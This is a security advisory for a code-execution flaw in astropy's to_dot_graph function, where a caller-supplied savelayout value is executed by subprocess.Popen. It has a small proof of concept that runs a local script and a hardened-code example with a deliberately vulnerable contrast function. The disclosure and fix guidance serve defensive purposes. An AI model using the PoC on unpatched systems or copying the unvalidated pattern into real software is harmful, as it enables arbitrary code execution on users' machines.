GHSA-h2x6-5jx5-46hf

Published: 18 Mar 2024
Source: github
GitHub: reviewed
CVSS3: 8.4

Description

RCE in TranformGraph().to_dot_graph function

Summary

RCE due to improper input validation in TranformGraph().to_dot_graph function

Details

Due to improper input validation, a malicious user can pass a command or a script file as the value of the `savelayout` argument; that value is placed as the first element of the argument list handed to `subprocess.Popen` (https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539). An error is raised afterwards, but by then the command or script has already been executed.

PoC

$ cat /tmp/script
#!/bin/bash
echo astrorce > /tmp/poc.txt

$ python3
Python 3.9.2 (default, Feb 28 2021, 17:03:44) [GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from astropy.coordinates.transformations import TransformGraph
>>> tg = TransformGraph()
>>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph
    stdout, stderr = proc.communicate(dotgraph)
  File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate
    stdout, stderr = self._communicate(input, endtime, timeout)
  File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate
    input_view = memoryview(self._input)
TypeError: memoryview: a bytes-like object is required, not 'str'
>>>

$ cat /tmp/poc.txt
astrorce
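The root cause above is that a caller-supplied string becomes argv[0] of a `subprocess.Popen` call, and the only "validation" is a `TypeError` that fires after the process has already been spawned. The following is an added example, not astropy's code: it contrasts that vulnerable shape with a hardened one that allowlists the layout engine and rejects paths before anything is executed. The allowlist of Graphviz engines and the helper names are assumptions made for this example.

```python
import os
import shutil
import subprocess

# Assumption for this example: the Graphviz layout engines a to_dot_graph-style
# helper would legitimately run. Not astropy's own list.
ALLOWED_LAYOUT_PROGRAMS = frozenset({"dot", "neato", "fdp", "sfdp", "circo", "twopi"})


def build_layout_argv_unvalidated(savelayout, fmt="png"):
    """The vulnerable shape: whatever the caller passes becomes argv[0].

    A list argv means no shell, so metacharacters are inert, but the first
    element is still executed as a program. Any existing executable path
    (e.g. a script the caller controls) is therefore run as-is."""
    return [savelayout, f"-T{fmt}"]


def is_allowed_layout_program(savelayout):
    """True only for a bare, allowlisted engine name (no path components)."""
    if not isinstance(savelayout, str) or not savelayout:
        return False
    # A path separator means the caller points at a file, not an engine name.
    if os.sep in savelayout or (os.altsep and os.altsep in savelayout):
        return False
    return savelayout in ALLOWED_LAYOUT_PROGRAMS


def validate_layout_program(savelayout):
    """Raise before any process is created if the value is not acceptable."""
    if not is_allowed_layout_program(savelayout):
        raise ValueError(
            f"savelayout must be one of {sorted(ALLOWED_LAYOUT_PROGRAMS)}, got {savelayout!r}"
        )
    return savelayout


def build_layout_argv(savelayout, fmt="png"):
    """Hardened shape: validate first, then build the argument list."""
    program = validate_layout_program(savelayout)
    return [program, f"-T{fmt}"]


def render_dot(dotgraph, savelayout="dot", fmt="png"):
    """Run the validated layout engine over `dotgraph` and return its bytes.

    Validation happens before Popen, so a rejected value never reaches the
    OS; in the PoC the TypeError is raised only after the process started."""
    argv = build_layout_argv(savelayout, fmt)
    if shutil.which(argv[0]) is None:
        raise FileNotFoundError(f"{argv[0]} is not installed")
    proc = subprocess.Popen(
        argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE
    )
    # communicate() needs bytes; passing a str is exactly the TypeError in the PoC.
    stdout, stderr = proc.communicate(dotgraph.encode("utf-8"))
    if proc.returncode != 0:
        raise RuntimeError(stderr.decode("utf-8", "replace"))
    return stdout


if __name__ == "__main__":
    # Constructed inputs: one legitimate engine name, one file path.
    print(build_layout_argv("dot"))                      # ['dot', '-Tpng']
    print(build_layout_argv_unvalidated("/tmp/script"))  # path lands in argv[0]
    try:
        build_layout_argv("/tmp/script")
    except ValueError as exc:
        print("rejected before Popen:", exc)
```

The design point is where the check sits: the hardened version decides whether `savelayout` names a permitted engine before `Popen` is ever called, so the failure mode is a `ValueError` with no side effects, rather than a spawned process followed by an unrelated `TypeError`.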

Impact

Code execution on the user's machine.

Packages

Name | Ecosystem | Affected versions | Fixed version
astropy | pip | < 5.3.3 | 5.3.3

EPSS

Percentile: 85%
0.02432
Low

8.4 High

CVSS3

Weaknesses

CWE-74
CWE-77

Related vulnerabilities

CVSS3: 8.4
ubuntu
almost 2 years ago

Astropy is a project for astronomy in Python that fosters interoperability between Python astronomy packages. Version 5.3.2 of the Astropy core package is vulnerable to remote code execution due to improper input validation in the `TranformGraph().to_dot_graph` function. A malicious user can provide a command or a script file as a value to the `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. Although an error will be raised, the command or script will be executed successfully. Version 5.3.3 fixes this issue.

CVSS3: 8.4
nvd
almost 2 years ago

Astropy is a project for astronomy in Python that fosters interoperability between Python astronomy packages. Version 5.3.2 of the Astropy core package is vulnerable to remote code execution due to improper input validation in the `TranformGraph().to_dot_graph` function. A malicious user can provide a command or a script file as a value to the `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. Although an error will be raised, the command or script will be executed successfully. Version 5.3.3 fixes this issue.

CVSS3: 8.4
debian
almost 2 years ago

Astropy is a project for astronomy in Python that fosters interoperabi ...
